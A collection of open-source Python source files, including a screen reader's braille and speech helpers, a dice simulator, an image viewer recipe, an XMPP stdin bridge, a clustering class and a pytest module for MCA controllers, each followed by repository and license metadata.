for item in items:
line.addRegion(braille.Region(" " + item))
braille.refresh()
def updateBrailleForNewCaretPosition(self, obj):
"""Try to reposition the cursor without having to do a full update."""
if not _settingsManager.getSetting('enableBraille') \
and not _settingsManager.getSetting('enableBrailleMonitor'):
debug.println(debug.LEVEL_INFO, "BRAILLE: update caret disabled")
return
brailleNeedsRepainting = True
line = braille.getShowingLine()
for region in line.regions:
if isinstance(region, braille.Text) and region.accessible == obj:
if region.repositionCursor():
self.refreshBraille(True)
brailleNeedsRepainting = False
break
if brailleNeedsRepainting:
self.updateBraille(obj)
@staticmethod
def refreshBraille(panToCursor=True, targetCursorCell=0, getLinkMask=True,
stopFlash=True):
"""This is the method scripts should use to refresh braille rather
than calling braille.refresh() directly. The intent is to centralize
such calls into as few places as possible so that we can easily and
safely not perform braille-related functions for users who do not
have braille and/or the braille monitor enabled.
Arguments:
- panToCursor: if True, will adjust the viewport so the cursor is
showing.
- targetCursorCell: Only effective if panToCursor is True.
0 means automatically place the cursor somewhere on the display so
as to minimize movement but show as much of the line as possible.
A positive value is a 1-based target cell from the left side of
the display and a negative value is a 1-based target cell from the
right side of the display.
- getLinkMask: Whether or not we should take the time to get the
attributeMask for links. Reasons we might not want to do so include
knowing that we will fail and/or it taking an unreasonable
amount of time (AKA Gecko).
- stopFlash: if True, kill any flashed message that may be showing.
"""
braille.refresh(panToCursor, targetCursorCell, getLinkMask, stopFlash)
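# Illustrative usage sketch (not from the original source; 'script' stands
# for any Script instance):
#
#     script.refreshBraille()                    # pan so the cursor is shown
#     script.refreshBraille(targetCursorCell=1)  # pin cursor to leftmost cell
#     script.refreshBraille(getLinkMask=False)   # skip the costly link mask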
@staticmethod
def setBrailleFocus(region, panToFocus=True, getLinkMask=True):
"""Specififes the region with focus. This region will be positioned
at the home position if panToFocus is True.
Arguments:
- region: the given region, which must be in a line that has been
added to the logical display
- panToFocus: whether or not to position the region at the home
position
- getLinkMask: Whether or not we should take the time to get the
attributeMask for links. Reasons we might not want to do so include
knowing that we will fail and/or it taking an unreasonable
amount of time (AKA Gecko).
"""
braille.setFocus(region, panToFocus, getLinkMask)
@staticmethod
def _setContractedBraille(event):
"""Turns contracted braille on or off based upon the event.
Arguments:
- event: an instance of input_event.BrailleEvent. event.event is
the dictionary form of the expanded BrlAPI event.
"""
braille.setContractedBraille(event)
########################################################################
# #
# Speech methods #
# (scripts should not call methods in speech.py directly) #
# #
########################################################################
def speakCharacter(self, character):
"""Method to speak a single character. Scripts should use this
method rather than calling speech.speakCharacter directly."""
if character.isupper():
voice = self.voices[settings.UPPERCASE_VOICE]
else:
voice = self.voices[settings.DEFAULT_VOICE]
spokenCharacter = chnames.getCharacterName(character)
speech.speakCharacter(spokenCharacter, voice)
def speakMessage(self, string, voice=None, interrupt=True):
"""Method to speak a single string. Scripts should use this
method rather than calling speech.speak directly.
- string: The string to be spoken.
- voice: The voice to use. By default, the "system" voice will
be used.
- interrupt: If True, any current speech should be interrupted
prior to speaking the new text.
"""
if _settingsManager.getSetting('enableSpeech'):
voice = voice or self.voices.get(settings.SYSTEM_VOICE)
speech.speak(string, voice, interrupt)
@staticmethod
def presentItemsInSpeech(items):
"""Method to speak a list of items. Scripts should call this
method rather than handling the creation and speaking of
utterances directly.
Arguments:
- items: a list of strings to be presented
"""
utterances = []
for item in items:
utterances.append(item)
speech.speak(utterances)
def speakUnicodeCharacter(self, character):
""" Speaks some information about an unicode character.
At the Momment it just anounces the character unicode number but
this information may be changed in the future
Arguments:
- character: the character to speak information of
"""
speech.speak(messages.UNICODE % \
self.utilities.unicodeValueString(character))
def presentTime(self, inputEvent):
""" Presents the current time. """
timeFormat = _settingsManager.getSetting('presentTimeFormat')
message = time.strftime(timeFormat, time.localtime())
self.presentMessage(message)
return True
def presentDate(self, inputEvent):
""" Presents the current date. """
dateFormat = _settingsManager.getSetting('presentDateFormat')
message = time.strftime(dateFormat, time.localtime())
self.presentMessage(message)
return True
|
pvagner/orca
|
src/orca/scripts/default.py
|
Python
|
lgpl-2.1
| 175,590
|
#!/usr/bin/env python
"""A command-line tool for simulating various dice throw situations.
Copyright (C) 2014-2018 Simon Muller
This library is free software; you can redistribute it and/or
modify it under the terms of the GNU Lesser General Public
License as published by the Free Software Foundation; either
version 2.1 of the License, or (at your option) any later version.
This library is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public
License along with this library; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
"""
import argparse
import random
from collections import OrderedDict
from copy import copy
__author__ = "Simon Muller"
__copyright__ = "Copyright 2014-2018, Simon Muller"
__version__ = "1.0.0"
def roll_die(sides=6):
"""Throw one die and return it's result."""
return random.randint(1, sides)
def roll_dice(num=2, sides=6):
"""Throw multiple dice and return their results."""
if isinstance(sides, int):
return [roll_die(sides) for _ in range(num)]
elif isinstance(sides, list):
assert len(sides) == num
return [roll_die(s) for s in sides]
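# Illustrative examples (results vary with the random seed):
#     roll_dice(3)           # -> e.g. [4, 1, 6], three six-sided dice
#     roll_dice(2, [6, 20])  # -> e.g. [3, 17], a d6 and a d20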
def reroll_dice(rerolls=3, num=2, sides=6):
"""Performs multiple dice rolls and and returns their results."""
return [roll_dice(num, sides) for _ in range(rerolls)]
def keep_value(outcome, values_of_interest):
"""A keep strategy that keeps all dices that land on the given values."""
return [d for d in outcome if d in values_of_interest]
def keep_none(outcome, values_of_interest=None):
"""A keep strategy that never keeps any dice."""
return []
def keep_unique(outcome, values_of_interest=None):
"""A keep strategy that throws away duplicates."""
return list(set(outcome))
def keep_duplicates(outcome, values_of_interest=None):
"""A keep strategy that keeps only duplicates."""
return [d for d in outcome if outcome.count(d) > 1]
def keep_some_unique(outcome, num=5):
"""A keep strategy that throws away duplicates, but never keeps more than 'num' dice."""
s = set(outcome)
while len(s) > num:
_ = s.pop()
return list(s)
def order_dice(outcome, values_of_interest):
"""A reduction function for a set of dice values where order doesn't matter."""
if len(values_of_interest) == 0:
return tuple(sorted(outcome))
for value in copy(outcome):
# Completely ignore dice that don't have values of interest
if value not in values_of_interest:
outcome.remove(value)
return tuple(sorted(outcome))
def count_unique(outcome, values_of_interest):
"""A reduction function for counting how many values are unique."""
return len(set(outcome))
def sum_values(outcome, values_of_interest):
"""A reduction function for summing the values in a result."""
if len(values_of_interest) == 0:
return sum(outcome)
# Only sum dice with values of interest
total = 0
for value in values_of_interest:
total += outcome.count(value) * value
return total
def count_values(outcome, values_of_interest):
"""A reduction function for counting the number of given values on a result."""
count = 0
for value in values_of_interest:
count += outcome.count(value)
return count
def dice_throw(outcome, values_of_interest):
"""A reduction function that keeps the precise result of the dice throws (including order)."""
return tuple(outcome)
def reroll_dice_with_choice(keep_strategy=keep_none, rerolls=3, num=2, sides=6):
"""Perform multiple rerolls, but with the choice to keep some dice the same
and reroll all the others. Return all rolls."""
outcomes = [roll_dice(num, sides)]
for i in range(rerolls - 1):
prev_outcome = copy(outcomes[-1])
to_keep = keep_strategy(prev_outcome)
new_outcome = []
for d in to_keep:
if d in prev_outcome:
new_outcome.append(d)
prev_outcome.remove(d)
else:
assert False, "Keep_strategy() result is corrupt: {} from {}"\
.format(to_keep, prev_outcome)
new_outcome.extend(roll_dice(num - len(new_outcome), sides))
outcomes.append(new_outcome)
return outcomes
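# Illustrative example (results vary with the random seed): keep all sixes
# across three rolls of five dice, rerolling everything else each time.
#
#     from functools import partial
#     rolls = reroll_dice_with_choice(
#         keep_strategy=partial(keep_value, values_of_interest=[6]),
#         rerolls=3, num=5)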
def reroll_dice_with_choice_last_only(keep_strategy=keep_none, rerolls=3, num=2, sides=6):
"""Perform multiple rerolls with choice, but only return the final result."""
outcomes = reroll_dice_with_choice(keep_strategy, rerolls, num, sides)
outcome = outcomes[-1]
return outcome
def reduce_many_dice_rolls(action=sum, times=100, num=2, sides=6):
"""Roll multiple dice many times and each time perform some action
on the dice to calculate a single value. Return results as a generator."""
return (action(roll_dice(num, sides)) for _ in range(times))
def run_many_times(func, times=100):
"""Create a generator that returns the result of running the given function
multiple times."""
return (func() for _ in range(times))
def count_outcomes(values):
"""Count the number of identical outcomes and return histogram."""
count_dict = {}
for value in values:
# The outcome values have to be hashable to be inserted into dict
# Outcomes containing lists should therefore be converted to tuples
if value in count_dict:
count_dict[value] += 1
else:
count_dict[value] = 1
return count_dict
def count_total_events(hist):
"""Sum the number of values in a histogram (which are values in a dictionary)."""
total = 0
# Count total number of events
for key in hist:
total += hist[key]
return total
def hist_counts_to_probabilities(hist):
"""Convert a histogram of event counts into probabilities."""
total = count_total_events(hist)
# Divide number of events by total to get probabilities
for k, v in hist.items():
hist[k] = (v / float(total))
return hist
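# Illustrative example: estimate the distribution of 2d6 sums.
#
#     hist = count_outcomes(reduce_many_dice_rolls(action=sum, times=10000))
#     probs = hist_counts_to_probabilities(hist)  # probs[7] is roughly 0.167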
def run_multiple_times_and_print_stats(func, N=100, use_percentages=False):
"""Run a function N times and print out a histogram of the results."""
outcomes = run_many_times(func, times=N)
hist = count_outcomes(outcomes)
if use_percentages:
odds = hist_counts_to_probabilities(hist)
# Use an ordered dict so that we can print with sorted keys
odds = OrderedDict(sorted(odds.items()))
for k, v in odds.items():
# Print probabilities as percentages
print("{}: {:>5.2f} %".format(k, 100*v))
else:
total = count_total_events(hist)
# Use an ordered dict so that we can print with sorted keys
hist = OrderedDict(sorted(hist.items()))
for k, v in hist.items():
print("{}: {:>{width}} out of {}".format(k, v, total, width=len(str(total))))
REDUCE_ARG_OPTIONS = {
"sum": (sum_values, "total sum of dice values in a throw"),
"order": (order_dice, "ordered dice values"),
"count": (count_values, "number of dice with the value {}"),
"unique": (count_unique, "number of unique dice in a throw"),
"values": (dice_throw, "dice values"),
}
def parse_arg_reduce_function(args):
"""Parse command-line arguments for the reduce function."""
if len(args) == 0:
args = ["sum"]
if args[0] in REDUCE_ARG_OPTIONS:
func = REDUCE_ARG_OPTIONS[args[0]][0]
details = REDUCE_ARG_OPTIONS[args[0]][1]
else:
raise Exception("'--stats' parameter has to specify a valid reduction function, " +
" not '{}'. Valid options are: {}".format(args[0], REDUCE_ARG_OPTIONS.keys()))
reduce_args = []
for arg in args[1:]:
reduce_args.append(int(arg))
return func, reduce_args, (details.format(reduce_args))
KEEP_ARG_OPTIONS = {
"none": keep_none,
"value": keep_value,
"unique": keep_unique,
"duplicate": keep_duplicates,
}
def parse_arg_keep_function(args):
"""Parse command-line arguments for the keep strategy."""
if args is None or len(args) == 0:
args = ["none"]
if args[0] in KEEP_ARG_OPTIONS:
func = KEEP_ARG_OPTIONS[args[0]]
else:
raise Exception("'--keep' parameter has to specify a valid keep strategy, " +
" not '{}'. Valid options are: {}".format(args[0], KEEP_ARG_OPTIONS.keys()))
keep_args = []
for arg in args[1:]:
keep_args.append(int(arg))
return func, keep_args
def parse_args():
"""Parse command-line arguments."""
parser = argparse.ArgumentParser(
description="Simulate various dice throw situations.", add_help=False,
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument("-h", "--help", action="help", help="Show this help message and exit.")
parser.add_argument('--version', action='version',
version='%(prog)s, version {}\nSimon Muller <samullers@gmail.com>'.format(__version__))
parser.add_argument("-n", dest="num", type=int, default=1,
help="Specify the number of dice to throw.")
parser.add_argument("-s", dest="sides", type=int, default=6,
help="Specify the number of sides all dice have.")
parser.add_argument("-ss", dest="multi_sides", type=int, nargs="*", metavar="SIDES",
help="Specify the number of sides for each individual die.")
parser.add_argument("-r", dest="reroll", type=int, default=1,
help="Perform multiple rerolls (stats only count last roll).")
parser.add_argument("--keep", nargs="*", metavar="STRATEGY",
help="Choose a keeping strategy when performing rerolls. Options are: {}."
.format(KEEP_ARG_OPTIONS.keys(),))
parser.add_argument("--stats", nargs="*", metavar="REDUCE",
help="Performs multiple throws and outputs cumulative results. " +
"Provide a parameter to choose an approach for reducing a " +
"dice throw to a single value of interest. Options are: %s." %
(REDUCE_ARG_OPTIONS.keys(),))
parser.add_argument("-N", type=int, default=1000, metavar="SIMULATIONS",
help="Set the number of simulations to run for statistical results.", )
parser.add_argument("--counts", default=False, action="store_true",
help="Print actual event counts instead of percentages in the statistical results.", )
parser.add_argument("--seed", type=int,
# "Set the seed value used for randomizing results."
help=argparse.SUPPRESS)
args = parser.parse_args()
if args.multi_sides is not None:
if len(args.multi_sides) != args.num:
raise Exception("'-ss' parameter has to specify the same number of values as there are dice.")
args.sides = args.multi_sides
args.keep = parse_arg_keep_function(args.keep)
if args.stats is not None:
args.stats = parse_arg_reduce_function(args.stats)
if args.seed is not None:
random.seed(args.seed)
return args
def main():
settings = parse_args()
def keep_strategy(outcome):
return settings.keep[0](
outcome,
settings.keep[1] if len(settings.keep) > 1 else None
)
def reduce_func(outcome):
return settings.stats[0](
outcome,
settings.stats[1] if len(settings.stats) > 1 else None
)
if settings.stats is not None:
# Perform multiple simulations and output statistical results
def perform_roll():
return reduce_func(
reroll_dice_with_choice_last_only(
keep_strategy=keep_strategy,
rerolls=settings.reroll,
num=settings.num,
sides=settings.sides),
)
print("{}:".format(settings.stats[2].capitalize()))
run_multiple_times_and_print_stats(perform_roll,
N=settings.N,
use_percentages=not settings.counts)
else:
# Perform a single simulation and output results
results = reroll_dice_with_choice(
keep_strategy=keep_strategy,
rerolls=settings.reroll,
num=settings.num,
sides=settings.sides)
for result in results:
print(result)
if __name__ == "__main__":
main()
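# Illustrative invocations (not part of the original file):
#     python dice.py -n 2                       # roll two six-sided dice once
#     python dice.py -n 5 -r 3 --keep value 6   # keep sixes over 3 rerolls
#     python dice.py -n 2 --stats sum -N 10000  # distribution of 2d6 sums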
|
samuller/dice
|
dice.py
|
Python
|
lgpl-2.1
| 12,835
|
# Copyright 2017-2018 The Tangram Developers. See the AUTHORS file at the
# top-level directory of this distribution and at
# https://github.com/renatoGarcia/tangram/blob/master/AUTHORS.
#
# This file is part of Tangram.
#
# Tangram is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Tangram is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Tangram in the COPYING and COPYING.LESSER files.
# If not, see <http://www.gnu.org/licenses/>.
from typing import Union, Mapping, Iterable, Tuple, Any
import numpy as np
from ..pixmap import Pixmap
from ..widget import ImageViewer, MainWindow, Notebook
from ..input_states import Key, Modifier
class _Dispatcher:
def __init__(self, objs: Iterable[Tuple[Any, str]]) -> None:
self._objs: Iterable[Tuple[Any, str]] = objs
def __call__(self, *args, **kwargs):
for obj, name in self._objs:
getattr(obj, name)(*args, **kwargs)
def __iadd__(self, value) -> '_Dispatcher':
for obj, name in self._objs:
v = getattr(obj, name)
v += value
setattr(obj, name, v)
return self
def __isub__(self, value) -> '_Dispatcher':
for obj, name in self._objs:
v = getattr(obj, name)
v -= value
setattr(obj, name, v)
return self
class _Broadcaster:
def __init__(self, viewers: Notebook) -> None:
self._viewers: Notebook = viewers
def __getattr__(self, name):
return _Dispatcher((viewer, name) for viewer in self._viewers.values())
def __setattr__(self, name, value):
if name == '_viewers':
object.__setattr__(self, name, value)
elif not isinstance(value, _Dispatcher):
for viewer in self._viewers.values():
setattr(viewer, name, value)
class _Switcher:
def __init__(self, viewers: Notebook) -> None:
self._viewers: Notebook = viewers
def __getattr__(self, name):
return _Dispatcher([(self._viewers.current_child, name)])
def __setattr__(self, name, value):
if name == '_viewers':
object.__setattr__(self, name, value)
elif not isinstance(value, _Dispatcher):
viewer = self._viewers.current_child
setattr(viewer, name, value)
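# Illustrative sketch (not from the original source): _Broadcaster fans an
# attribute access out to every viewer, while _Switcher targets only the
# notebook's current child.
#
#     broadcaster.zoom_in()    # calls zoom_in() on every ImageViewer
#     switcher.zoom = 2.0      # sets zoom only on the current tab's viewer
#     switcher.v_offset += 20  # read-modify-write via _Dispatcher.__iadd__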
def _on_key_press(notebook: Notebook,
broadcaster: _Broadcaster,
switcher: _Switcher,
key: Key,
modifiers: Modifier) -> None:
if key is Key.underscore:
if Modifier.Control in modifiers:
broadcaster.fit_image()
else:
switcher.fit_image()
elif key is Key.minus:
if Modifier.Control in modifiers:
broadcaster.zoom_out()
else:
switcher.zoom_out()
elif key is Key.plus:
if Modifier.Control in modifiers:
broadcaster.zoom_in()
else:
switcher.zoom_in()
elif key is Key.equal:
if Modifier.Control in modifiers:
broadcaster.zoom = 1.0
else:
switcher.zoom = 1.0
elif key in [Key.Tab, Key.ISO_Left_Tab] and Modifier.Control in modifiers:
if Modifier.Shift in modifiers:
notebook.prev_page()
else:
notebook.next_page()
elif key is Key.J:
notebook.prev_page()
elif key is Key.K:
notebook.next_page()
elif key is Key.j:
if Modifier.Mod1 in modifiers:
switcher.v_offset += 1
else:
switcher.v_offset += 20
elif key is Key.k:
if Modifier.Mod1 in modifiers:
switcher.v_offset -= 1
else:
switcher.v_offset -= 20
elif key is Key.h:
if Modifier.Mod1 in modifiers:
switcher.h_offset -= 1
else:
switcher.h_offset -= 20
elif key is Key.l:
if Modifier.Mod1 in modifiers:
switcher.h_offset += 1
else:
switcher.h_offset += 20
def imshow(image: Union[np.ndarray, Mapping[str, np.ndarray], Iterable[np.ndarray]]) -> None:
if isinstance(image, np.ndarray):
notebook = Notebook({'': ImageViewer(Pixmap(image))}, tabs_are_visible=False)
elif isinstance(image, Mapping):
notebook = Notebook({name: ImageViewer(Pixmap(img)) for name, img in image.items()})
else:
notebook = Notebook({str(idx): ImageViewer(Pixmap(img))
for idx, img in enumerate(image, start=1)})
broadcaster = _Broadcaster(notebook)
switcher = _Switcher(notebook)
mw = MainWindow(title="Tangram", widget=notebook)
mw.key_press.add_callback(lambda key, modifier:
_on_key_press(notebook, broadcaster, switcher, key, modifier))
mw.show()
mw.destroy.wait()
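# Illustrative usage (assumes a working Tangram installation and that Pixmap
# accepts a float array):
#
#     import numpy as np
#     from tangram.recipes.imshow import imshow
#     imshow({'noise': np.random.rand(64, 64)})  # one notebook tab per image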
|
renatoGarcia/tangram
|
tangram/recipes/imshow.py
|
Python
|
lgpl-3.0
| 5,231
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from .attribute import Attribute
class AttrFactory:
"""Produces attributes."""
@classmethod
def make(cls, *args, **kwargs):
"""Produce an attribute.
Args:
*args: Arguments to pass to the attribute constructor.
**kwargs: Keyword arguments to pass to the attribute constructor.
Returns:
Attribute instance.
"""
attr = Attribute(*args, **kwargs)
return attr
|
pyfa-org/eos
|
eos/eve_obj/attribute/factory.py
|
Python
|
lgpl-3.0
| 1,354
|
#!/usr/bin/env python3
########################################################################
# File name: xmpp_bridge.py
# This file is part of: aioxmpp
#
# LICENSE
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
########################################################################
import asyncio
import asyncio.streams
import os
import signal
import sys
import aioxmpp
async def stdout_writer():
"""
This is a bit complex, as stdout can be a pipe or a file.
If it is a file, we cannot use
:meth:`asyncio.BaseEventLoop.connect_write_pipe`.
"""
if sys.stdout.seekable():
# it’s a file
return sys.stdout.buffer.raw
if os.isatty(sys.stdin.fileno()):
# it’s a tty, use fd 0
fd_to_use = 0
else:
fd_to_use = 1
twrite, pwrite = await loop.connect_write_pipe(
asyncio.streams.FlowControlMixin,
os.fdopen(fd_to_use, "wb"),
)
swrite = asyncio.StreamWriter(
twrite,
pwrite,
None,
loop,
)
return swrite
async def main(local, password, peer,
strip_newlines, add_newlines):
loop = asyncio.get_event_loop()
swrite = await stdout_writer()
sread = asyncio.StreamReader()
tread, pread = await loop.connect_read_pipe(
lambda: asyncio.StreamReaderProtocol(sread),
sys.stdin,
)
client = aioxmpp.Client(
local,
aioxmpp.make_security_layer(
password,
)
)
sigint = asyncio.Event()
loop.add_signal_handler(signal.SIGINT, sigint.set)
loop.add_signal_handler(signal.SIGTERM, sigint.set)
def recv(message):
body = message.body.lookup(
[aioxmpp.structs.LanguageRange.fromstr("*")]
)
if add_newlines:
body += "\n"
swrite.write(body.encode("utf-8"))
client.stream.register_message_callback(
"chat",
peer,
recv
)
sigint_future = asyncio.ensure_future(sigint.wait())
read_future = asyncio.ensure_future(sread.readline())
try:
async with client.connected() as stream:
# we send directed presence to the peer
pres = aioxmpp.Presence(
type_=aioxmpp.PresenceType.AVAILABLE,
to=peer,
)
await stream.send(pres)
while True:
done, pending = await asyncio.wait(
[
sigint_future,
read_future,
],
return_when=asyncio.FIRST_COMPLETED,
)
if sigint_future in done:
break
if read_future in done:
line = read_future.result().decode()
if not line:
break
if strip_newlines:
line = line.rstrip()
msg = aioxmpp.Message(
type_="chat",
to=peer,
)
msg.body[None] = line
await stream.send(msg)
read_future = asyncio.ensure_future(
sread.readline()
)
finally:
sigint_future.cancel()
read_future.cancel()
def jid(s):
return aioxmpp.JID.fromstr(s)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(
description="""
Send lines from stdin to the given peer and print messages received
from the peer to stdout.""",
epilog="""
The password must be set in the XMPP_BRIDGE_PASSWORD environment
variable."""
)
parser.add_argument(
"--no-strip-newlines",
dest="strip_newlines",
action="store_false",
default=True,
help="Disable stripping newlines from stdin"
)
parser.add_argument(
"--no-add-newlines",
dest="add_newlines",
action="store_false",
default=True,
help="Disable adding newlines to stdout"
)
parser.add_argument(
"local",
help="JID to bind to",
type=jid,
)
parser.add_argument(
"peer",
help="JID of the peer to send messages to",
type=jid,
)
args = parser.parse_args()
try:
password = os.environ["XMPP_BRIDGE_PASSWORD"]
except KeyError:
parser.print_help()
print("XMPP_BRIDGE_PASSWORD is not set", file=sys.stderr)
sys.exit(1)
loop = asyncio.get_event_loop()
loop.run_until_complete(main(
args.local, password, args.peer,
args.strip_newlines,
args.add_newlines,
))
loop.close()
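# Illustrative invocation (not part of the original example):
#     XMPP_BRIDGE_PASSWORD=secret ./xmpp_bridge.py user@example.org peer@example.org
# Lines typed on stdin are sent as chat messages to the peer; messages
# received from the peer are written to stdout.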
|
horazont/aioxmpp
|
examples/xmpp_bridge.py
|
Python
|
lgpl-3.0
| 5,377
|
# This file is part of PyEMMA.
#
# Copyright (c) 2015, 2014 Computational Molecular Biology Group, Freie Universitaet Berlin (GER)
#
# PyEMMA is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on 26.01.2015
@author: marscher
'''
from __future__ import absolute_import
import warnings
from pyemma.coordinates.clustering import regspatial
from pyemma.coordinates.clustering.interface import AbstractClustering
from pyemma.util.annotators import doc_inherit
from pyemma.util.exceptions import NotConvergedWarning
import numpy as np
__all__ = ['RegularSpaceClustering']
class RegularSpaceClustering(AbstractClustering):
r"""Regular space clustering"""
def __init__(self, dmin, max_centers=1000, metric='euclidean', stride=1, n_jobs=None):
"""Clusters data objects in such a way, that cluster centers are at least in
distance of dmin to each other according to the given metric.
The assignment of data objects to cluster centers is performed by
Voronoi partitioning.
Regular space clustering [Prinz_2011]_ is very similar to Hartigan's leader
algorithm [Hartigan_1975]_. It consists of two passes through
the data. Initially, the first data point is added to the list of centers.
For every subsequent data point, if it has a greater distance than dmin from
every center, it also becomes a center. In the second pass, a Voronoi
discretization with the computed centers is used to partition the data.
Parameters
----------
dmin : float
minimum distance between all clusters.
metric : str
metric to use during clustering ('euclidean', 'minRMSD')
max_centers : int
if this cutoff is hit during finding the centers,
the algorithm will abort.
n_jobs : int or None, default None
Number of threads to use during assignment of the data.
If None, all available CPUs will be used.
References
----------
.. [Prinz_2011] Prinz J-H, Wu H, Sarich M, Keller B, Senne M, Held M, Chodera JD, Schuette Ch and Noe F. 2011.
Markov models of molecular kinetics: Generation and Validation.
J. Chem. Phys. 134, 174105.
.. [Hartigan_1975] Hartigan J. Clustering algorithms.
New York: Wiley; 1975.
"""
super(RegularSpaceClustering, self).__init__(metric=metric, n_jobs=n_jobs)
self.set_params(dmin=dmin, metric=metric, max_centers=max_centers, stride=stride)
@doc_inherit
def describe(self):
return "[RegularSpaceClustering dmin=%f, inp_dim=%i]" % (self._dmin, self.data_producer.dimension())
@property
def dmin(self):
"""Minimum distance between cluster centers."""
return self._dmin
@dmin.setter
def dmin(self, d):
if d < 0:
raise ValueError("d has to be positive")
self._dmin = float(d)
self._estimated = False
@property
def max_centers(self):
"""
Cutoff during clustering. If reached no more data is taken into account.
You might then consider a larger value or a larger dmin value.
"""
return self._max_centers
@max_centers.setter
def max_centers(self, value):
if value < 0:
raise ValueError("max_centers has to be positive")
self._max_centers = int(value)
self._estimated = False
@property
def n_clusters(self):
return self.max_centers
@n_clusters.setter
def n_clusters(self, val):
self.max_centers = val
def _estimate(self, iterable, **kwargs):
########
# Calculate clustercenters:
# 1. choose first datapoint as centroid
# 2. for all X: calc distances to all clustercenters
# 3. add new centroid, if min(distance to all other clustercenters) >= dmin
########
# temporary list to store cluster centers
clustercenters = []
it = iterable.iterator(return_trajindex=False)
used_frames = 0
try:
with iterable.iterator(return_trajindex=False, stride=self.stride, chunk=self.chunksize) as it:
for X in it:
used_frames += len(X)
regspatial.cluster(X.astype(np.float32, order='C', copy=False),
clustercenters, self.dmin,
self.metric, self.max_centers)
except RuntimeError:
msg = 'Maximum number of cluster centers reached.' \
' Consider increasing max_centers or choose' \
' a larger minimum distance, dmin.'
self._logger.warning(msg)
warnings.warn(msg)
# finished anyway, because we have no more space for clusters. Rest of trajectory has no effect
clustercenters = np.array(clustercenters)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
# pass amount of processed data
used_data = used_frames / float(it.n_frames_total()) * 100.0
raise NotConvergedWarning("Used data for centers: %.2f%%" % used_data)
clustercenters = np.array(clustercenters)
self.update_model_params(clustercenters=clustercenters,
n_clusters=len(clustercenters))
if len(clustercenters) == 1:
self._logger.warning('Have found only one center according to '
'minimum distance requirement of %f' % self.dmin)
return self
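# Illustrative sketch (not part of PyEMMA) of the first pass described in the
# class docstring: greedily accept a point as a new center whenever it is at
# least dmin away from every existing center.
#
#     def regspace_centers(data, dmin):
#         centers = []
#         for x in data:
#             if all(np.linalg.norm(x - c) >= dmin for c in centers):
#                 centers.append(x)
#         return np.array(centers)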
|
gph82/PyEMMA
|
pyemma/coordinates/clustering/regspace.py
|
Python
|
lgpl-3.0
| 6,265
|
"""Test module for the XIA MCAs."""
import pytest
from bliss.controllers.mca import Brand, DetectorType, Stats
from bliss.controllers.mca import PresetMode, TriggerMode
from bliss.controllers.mca import XIA, XMAP
@pytest.fixture(
params=['xia', 'mercury', 'xmap', 'falconx'])
def xia(request, beacon, mocker):
beacon.reload()
# Mocking
m = mocker.patch('zerorpc.Client')
client = m.return_value
# Modules
client.get_detectors.return_value = ['detector1']
client.get_modules.return_value = ['module1']
# Elements
client.get_channels.return_value = (0, 1, 2, 3)
# Configuration
client.get_config_files.return_value = ['some_config.ini']
client.get_config.return_value = {'my': 'config'}
mtype = 'mercury' if request.param == 'xia' else request.param
client.get_module_type.return_value = mtype
# Emulate running behavior
client.is_running.return_value = True
def mock_not_running():
client.is_running.return_value = False
client.mock_not_running = mock_not_running
# Instantiating the xia
xia = beacon.get(request.param + '1')
assert xia._proxy is client
m.assert_called_once_with(xia._config['url'])
yield xia
def test_xia_instanciation(xia):
client = xia._proxy
config_dir = xia._config['configuration_directory']
default = xia._config['default_configuration']
client.init.assert_called_once_with(config_dir, default)
assert xia.current_configuration == default
assert xia.configured
def test_xia_infos(xia):
assert xia.detector_brand == Brand.XIA
if type(xia) is XIA:
assert xia.detector_type == DetectorType.MERCURY
else:
name = type(xia).__name__.upper()
assert xia.detector_type == getattr(DetectorType, name)
assert xia.elements == (0, 1, 2, 3)
def test_xia_configuration(xia):
client = xia._proxy
config_dir = xia._config['configuration_directory']
default = xia._config['default_configuration']
assert xia.available_configurations == ['some_config.ini']
client.get_config_files.assert_called_once_with(config_dir)
assert xia.current_configuration_values == {'my': 'config'}
client.get_config.assert_called_once_with(config_dir, default)
def test_xia_preset_mode(xia):
client = xia._proxy
# First test
xia.set_preset_mode(None)
assert client.set_acquisition_value.call_args_list == \
[(('preset_type', 0),), (('preset_value', 0),)]
client.apply_acquisition_values.assert_called_once_with()
# Error tests
with pytest.raises(ValueError):
xia.set_preset_mode(3)
